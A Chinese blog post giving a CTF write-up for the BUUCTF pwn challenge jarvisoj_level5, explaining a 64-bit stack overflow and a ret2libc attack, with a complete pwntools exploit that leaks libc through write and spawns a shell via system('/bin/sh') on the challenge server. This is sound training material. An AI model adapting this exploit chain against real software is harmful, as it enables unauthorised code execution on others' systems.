[BUUCTF]PWN——jarvisoj_level5

最新推荐文章于 2022-04-16 15:06:45 发布
最新推荐文章于 2022-04-16 15:06:45 发布
阅读量600 收藏
点赞数
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/112787707
版权

jarvisoj_level5

附件

步骤:

  1. 例行检查,64位程序,只开启了nx保护
    在这里插入图片描述
  2. 本地运行一下,看看大概的情况
    在这里插入图片描述
  3. 64位ida载入,找到关键函数
    在这里插入图片描述
    buf是0x80,read了0x200,明显的溢出漏洞。采用常规的ret2libc方法
  4. 程序里用过了write函数,所以利用write函数来泄露libc
    先看一下write函数的原型
ssize_t write( int  fd, const   void   * buf,size_t nbytes)

write函数将buf中的nbytes字节内容写入文件描述符fd.成功时返回写的字节数
文件描述符fd :分别是标准输入 0, 标准输出 1, 标准错误2
write函数有3个参数,64位程序传参要用到寄存器,从左到右是rdi, rsi, rdx, rcx, r8, r9

先找一下设置寄存器的指令,由于设置rsi的那个指令地址还设置了r15,可以用来放第三个参数,所以不用找rdx了
在这里插入图片描述
设置payload来泄露write函数的地址来获取libc,并将程序执行流劫持回到main函数,再次利用输入点的溢出漏洞

payload='a'*(0x80+8)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(write_got)+p64(8)+p64(write_plt)+p64(main_addr)

泄露了libc,计算程序里的system和bin/sh的地址

libc=LibcSearcher('write',write_addr)
offset=write_addr-libc.dump('write')
print hex(offset)

system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')

再次利用溢出漏洞,调用system(‘/bin/sh’)获取shell

payload='a'*(0x80+8)+p64(pop_rdi)+p64(bin_sh)+p64(system)+p64(0)

完整exp

from pwn import*
from LibcSearcher import*

r=remote('node3.buuoj.cn',25003)
elf=ELF('./level3_x64')

main_addr=0x40061a
pop_rdi=0x4006b3
pop_rsi_r15=0x4006b1

write_got=elf.got['write']
write_plt=elf.plt['write']

payload='a'*(0x80+8)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(write_got)+p64(8)+p64(write_plt)+p64(main_addr)
r.recvuntil('\n')
r.sendline(payload)
write_addr=u64(r.recv(8))
print hex(write_addr)

libc=LibcSearcher('write',write_addr)
offset=write_addr-libc.dump('write')
print hex(offset)

system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')

payload='a'*(0x80+8)+p64(pop_rdi)+p64(bin_sh)+p64(system)+p64(0)
r.sendline(payload)
r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2030
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
jarvisoj_level5
z1r0的博客
12-29 338
jarvisoj_level5 buu上的这个题目对应的是level3 x64。jarvisoj_level3 x64
JarvisOJ level5
PLpa的博客
07-11 398
题目要求不用system和execve函数,练习使用mmap和mprotect函数。 首先看一下mmap函数和mprotect函数有什么用。 mmap()函数 mmap将一个文件或者其它对象映射进内存。文件被映射到多个页上,如果文件的大小不是所有页的大小之和,最后一个页不被使用的空间将会清零。mmap在用户空间映射调用系统中作用很大。 头文件 <sys/mman.h> 函数原型 voi...
jarvis oj level5
发蝴蝶和大脑斧的博客
12-11 929
level5要求不用system和execve,而是用mprotect和mmap,查了一下,mmap主要是将哪个文件映射到一段内存去同时设置那段内存的属性 可读可写或者是可执行,mprotect函数是将从addr开始的地址 ,长度位len的内存的访问权限。毫无头绪。查了网上大神的wp,才知道思路。 首先leak地址,shellcode写入bss没什么好说的。 要说下为什么要把bss和mprotec...
[XMAN]level5 Jarvis OJ
九层台
07-10 1091
思路:bss段刚开始是不可执行的,从通用的想要执行bss必须执行mprotect函数来更改bss段的权限(改为7即可读可写可执行)。但是想要获取到mprotect函数必须获取到libc版本。还是少不了上次的泄露libc函数,这里泄露的时候也直接用通用gedit减少不必要的操作,减少错误。 泄露获取libc–&amp;gt;获取到mprotect函数来改写bss段的权限–&amp;gt;把shellcode写入到...
Ret2csu Jarvisoj level5_x64
Rt1Text的博客
04-16 255
1.checksec+运行 64位+NX保护 2.强大IDA进行中
BUUCTF之“jarvisoj_level5”中看如何暗度陈仓实现“mprotect”修改.bss段为可执行
Probeginner的博客
12-10 656
mprotect修改权限实践
SyntaxError: return outside function
逐梦人.的博客
10-10 1901
这种语法错误一般出现在return没有在函数内部写,而写在了函数外部或者没有定义函数的时候使用了,这种就会报错。
CTF-PWN level5(Jarvis Oj)
SuperGate的博客
05-16 813
level3_x64一样的文件,但是限制不能使用system和execv函数拿shell,但是可以用mmap和mprotect完成本题。 我尝试用mprotect来解决,首先mprotect的结构如下: int mprotect(const void *start, size_t len, int prot); 参数的含义是:把从start开始长度为len的内存区的保护属性修改为prot...
18.9.25 Jarvis OJ PWN----[XMAN]level5
qq_42192672的博客
09-25 534
题目提示: 参考链接:https://veritas501.space/2017/03/10/JarvisOJ_WP/                   https://blog.csdn.net/github_36788573/article/details/80178146 mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完...
jarvisoj pwn level5 wp
zszcr的博客
03-26 1956
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
jarvisoj level5爬坑
weixin_30512785的博客
11-12 157
本着纸上得来终觉浅,绝知此事要躬行的原则,把一个简单的ROP做了一下。漏洞很明显,libc有给出;唯一的限制就是不允许调用system或execve,而是用mprotect或者mmap 脚本调了半天,最后发现是shellcode的问题;这里边的一个坑是shellcraft.sh()要指定一个目标平台的架构,没用过shellcraft模块,连这么简单的错都犯,汗-_-|| from pwn ...
BUUCTF-pwn(5)
njh18790816639的博客
11-25 405
jarvisoj_level4 简单的ret2libc! from pwn import * from LibcSearcher import * context(log_level='debug',os='linux',arch='i386') r = remote('node4.buuoj.cn',25768) #r = process('./level4') elf = ELF('./level4') main = elf.symbols['main'] write_plt = elf.plt['
BUUCTF刷题5
m0_51251108的博客
10-30 551
题目:axb_2019_heap:actf_2019_babystack:picoctf_2018_got_shell:[极客大挑战 2019]Not Bad:gyctf_2020_force:picoctf_2018_can_you_gets_me:mrctf2020_easy_equation:wdb_2018_2nd_easyfmt:ciscn_2019_es_1:axb_2019_fmt64: axb_2019_heap: 参考师傅:buuctf axb_2019_heap_R1nd0的博客-CSD
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3537
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
buuctf jarvisoj_level2_x64
carol2358的博客
04-22 389
水题 栈溢出,system和binsh都可以用gdb找到 exp: from pwn import * from LibcSearcher import * local_file = './level2_x64' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.so.6' s...
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值